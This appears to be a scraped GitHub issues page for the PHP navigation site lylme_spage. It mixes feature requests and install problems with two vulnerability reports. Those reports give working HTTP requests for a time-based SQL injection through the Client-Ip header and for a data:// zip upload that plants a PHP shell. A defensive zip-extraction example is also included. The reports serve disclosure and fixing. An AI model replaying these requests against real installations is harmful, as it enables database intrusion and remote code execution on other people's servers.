lylme / lylme_spage
六零导航页
Home Page: https://hao.lylme.com/
License: Apache License 2.0
1. Send a POST request to http://host/apply/index.php?submit=post carrying the data below; the injection point is the Client-Ip field in the HTTP header.
POST /apply/index.php?submit=post HTTP/1.1
Host: host
User-Agent: python-requests/2.28.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cookie: PHPSESSID=;XDEBUG_SESSION=PHPSTORM
Client-Ip: 0'>if(1,sleep(10),2)>'
Content-Length: 70
url=http%3A%2F%2Fqq.comcAMMVjjb1OL&name=test&group_id=1&icon=&authcode=
payload: Client-Ip: 0'>if(1,sleep(10),2)>'
2. As shown above, the payload delays the response by more than 10 seconds.
The get_real_ip function is meant to obtain a valid, real client IP address.
Then $userip becomes part of the value of the $sql variable, which is executed by $DB->query($sql).
However, stepping into the vulnerable function get_real_ip, $real_ip can receive an unrestricted malicious SQL payload through the Client-Ip: header field.
So the attack payload Client-Ip: 0'>if(1,sleep(10),2)>' takes effect and is executed.
This SQL injection vulnerability affects the latest version: lylme_spage v1.7.0 (六零导航页 v1.7.0).
To fix this vulnerability, here are my suggestions:
1. In get_real_ip, check that the IP is formatted according to the IPv4 RFC
2. Sanitize the IP result, like this: strip_tags(daddslashes(get_real_ip()));
3. Delete this variable, which seems unused
I hope Docker deployment can be supported!
If the author isn't familiar with Docker, please tell us the required PHP and MySQL versions (and any other possible dependencies); I can also write a Dockerfile myself.
Opening the site is very slow, and there are problems with the page.
Installation failed
SQL: 41 statements succeeded / 2 failed
Error message: Duplicate entry '3' for key 'PRIMARY'
Incorrect table definition; there can be only one auto column and it must be defined as a key
It would be perfect if users could add, delete and edit the entries in the frequently-used navigation section themselves, with the data kept for logged-in users.
The fixed version works now.
After setting the port number, it shows
Downloading Docker image...
Error response from daemon: Head "https://registry-1.docker.io/v2/caomingjun/navpage/manifests/latest": dial tcp: lookup registry-1.docker.io on [::1]:53: server misbehaving
Aborted
Accessing the admin page
Warning: session_start(): Cannot start session when headers already sent in /var/www/html/pwd/index.php on line 52
Please enter the password to log in
Also, make the transparency of the group boxes adjustable!
I previously deployed the site with Docker, but the last step, adding the database, said there was no permission, so I switched to deploying with BT Panel (宝塔). After adding the database and creating the site, the domain won't open.
How do I import bookmarks exported from a browser?
With error_reporting(0); enabled
With error_reporting(0); disabled
When it is disabled, although it reports that the fetch succeeded, accessing the file returns 404: http://[hidden IP]/files/download/20230714062949251.ico
Once there are a lot of locally saved links, finding them gets a bit troublesome. Could a local search be added to the search bar?
Also, the favorites,
I'm on the Docker version; during installation a folder was generated and all files are inside it. To back up, is it enough to back up that folder?
Also, could a feature for sorting links be added later? And batch import/export of settings or links?
Hello
Which databases are supported, and how should the SSL setting be written?
Could you add second-level categories and a description feature? Mainly because after collecting URLs for a long time I forget what they were for myself.
I see that function.php seems to allow adding a description template, and you seem to have reserved this field in the database as well.
Tencent Cloud reports that the file /about/index.html contains a virus; what is going on?
1. Send a POST request to http://host/admin/ajax_link.php?submit=update carrying the data below; the injection point is the file field in the HTTP body.
Although this is a back-end (admin) vulnerability, a pre-auth chain to upload a shell can be built in conjunction with #32.
POST /lylme_spage-master/admin/ajax_link.php?submit=update HTTP/1.1
Host: host
Connection: close
Cookie: admin_token=ec2a3HYAaqQws10zQfeSJaDeJN1aI2gOnV9BLpaHNYdb2hHPQ9nYkoMzuOuQIokfoyJRVcVNK3aT8JUZXq5WSPqTBQ;
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
file=data://text/plain;base64,UEsDBBQAAAAIALMUSFdQg8x9EgAAABIAAAAFAAAAMS5waHCzsS/IKFAA4sy8tHwNTWt7OwBQSwECFAMUAAAACACzFEhXUIPMfRIAAAASAAAABQAAAAAAAAAAAAAAgAEAAAAAMS5waHBQSwUGAAAAAAEAAQAzAAAANQAAAAAA
2. After the request is submitted, the shell 1.php is extracted into the ROOT directory.
The code snippet shown is meant to update the system from a zip package. However, auditing the code more deeply, the $RemoteFile that gets extracted can be passed any malicious data, which is then released into the ROOT directory directly via the zipExtract function.
This vulnerability affects the latest version: lylme_spage v1.7.0
To fix this vulnerability, here are my suggestions:
1. Remove this function point
2. Restrict the file suffixes that get decompressed
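An added example, not code from the report above or from lylme_spage, showing the checks that would have stopped this chain: an allowlist on where the update package may be fetched from (which rejects the data:// wrapper used in the PoC, and php:// and the like) and, before anything is written, a per-entry path-traversal and suffix check along the lines of suggestion 2. Python is used so it runs stand-alone; the allowed host, the suffix policy and the sample zip are all constructed for the example. The suffix list stands in for whatever policy the project would actually choose: an update package that must legitimately ship PHP files needs the source check, not the suffix filter, to keep attacker-supplied zips out.

```python
import base64
import io
import os
import posixpath
import tempfile
import zipfile
from urllib.parse import urlparse

# Assumed update policy (hypothetical host and suffix list, not the project's).
ALLOWED_HOSTS = {"update.example.com"}
ALLOWED_SUFFIXES = {".css", ".js", ".html", ".png", ".ico", ".sql"}


def check_update_source(file_param):
    """Reject stream wrappers such as data:// or php:// and any host outside the
    allowlist, before the value is ever handed to a file-reading function.
    Returns (ok, reason)."""
    parts = urlparse(file_param)
    if parts.scheme != "https":
        return False, f"scheme {parts.scheme!r} is not https"
    if parts.hostname not in ALLOWED_HOSTS:
        return False, f"host {parts.hostname!r} not in allowlist"
    return True, "ok"


def safe_target(dest_root, member):
    """Map a zip member name to a path inside dest_root, or None if it would
    escape (absolute path, drive letter, backslash, or '..' components)."""
    if member.startswith(("/", "\\")) or "\\" in member or ":" in member:
        return None
    norm = posixpath.normpath(member)
    if norm == ".." or norm.startswith("../"):
        return None
    root = os.path.realpath(dest_root)
    target = os.path.realpath(os.path.join(root, norm))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def safe_extract(zip_bytes, dest_root, allowed_suffixes=ALLOWED_SUFFIXES):
    """Extract only members whose suffix is allowed and whose path stays inside
    dest_root. Returns (written member names, {member: reason} for rejects)."""
    written, rejected = [], {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if info.is_dir():
                continue                      # directories are created on demand
            target = safe_target(dest_root, name)
            if target is None:
                rejected[name] = "path escapes destination"
                continue
            if posixpath.splitext(name)[1].lower() not in allowed_suffixes:
                rejected[name] = "suffix not allowed"
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(name)
    return written, rejected


def build_sample_zip():
    """Constructed package: a 1.php like the report's PoC, a traversal entry,
    and two benign asset files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("1.php", "<?php phpinfo(); ?>")
        zf.writestr("../../evil.css", "body{}")
        zf.writestr("css/style.css", "body{}")
        zf.writestr("static/logo.png", b"\x89PNG\r\n")
    return buf.getvalue()


def demo():
    """Wrap the sample zip in a data:// URI the way the PoC does, run the source
    check on it, then extract the same zip with the entry checks applied."""
    package = build_sample_zip()
    data_uri = "data://text/plain;base64," + base64.b64encode(package).decode()
    source_ok, _ = check_update_source(data_uri)
    with tempfile.TemporaryDirectory() as dest:
        written, rejected = safe_extract(package, dest)
    return source_ok, sorted(written), rejected


if __name__ == "__main__":
    print(demo())
```

The source check is the one that matters for the PoC: the attacker never needed a reachable server, because the data:// wrapper turned the request body itself into the "remote" file. The extraction checks are defence in depth for the case where a package from the allowed host is tampered with in transit or on the mirror.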
I hope a second-level directory can be added so the categories are cleaner. For people with many links, having all links on one page is a bit messy.
For link descriptions, on themes that cannot display descriptions, could an option to show the description on mouse hover be added, as a toggle?
Of course, this is just a personal thought.
install/index.php?do=3
I changed the 3 to 4 and could continue.
Otherwise, when modifying or adding groups, adjusting the position only takes effect in the front end; in the back-end link management, clicking defaults to jumping to the group with database id 1.
Also, for the /pwd password page, it would be perfect if a token in the URL could replace the login step. Just a suggestion, of course. That way no password needs to be entered, and it's convenient to open from my bookmarks.
After setting Google as the first search engine, the icon defaults to the Baidu icon; after switching to another search engine and back, the Google icon disappears. I hope this can be fixed. My favorite navigation page, bar none.
Tutorial for upgrading from an old version to the new version
As the title says
Hello maintainer(s),
I am a security researcher from the Institute of Application Security at TU Braunschweig, Germany. We discovered a (potential) security vulnerability in your project.
We would like to report this vulnerability to you in a responsible and ethical manner.
Therefore, we do not want to disclose any details of the vulnerability publicly until you have had a chance to review and fix it.
Could you please let us know your preferred way of receiving security reports?
You can contact us at [email protected] or by replying to this issue.
Thank you for your attention and cooperation.
After entering the database info and clicking Next, it stays stuck at do=3 with the progress bar only half full.
Looking at earlier issues, it seems a PHP extension wasn't installed?
But the PHP extension requirements on the first page are all met.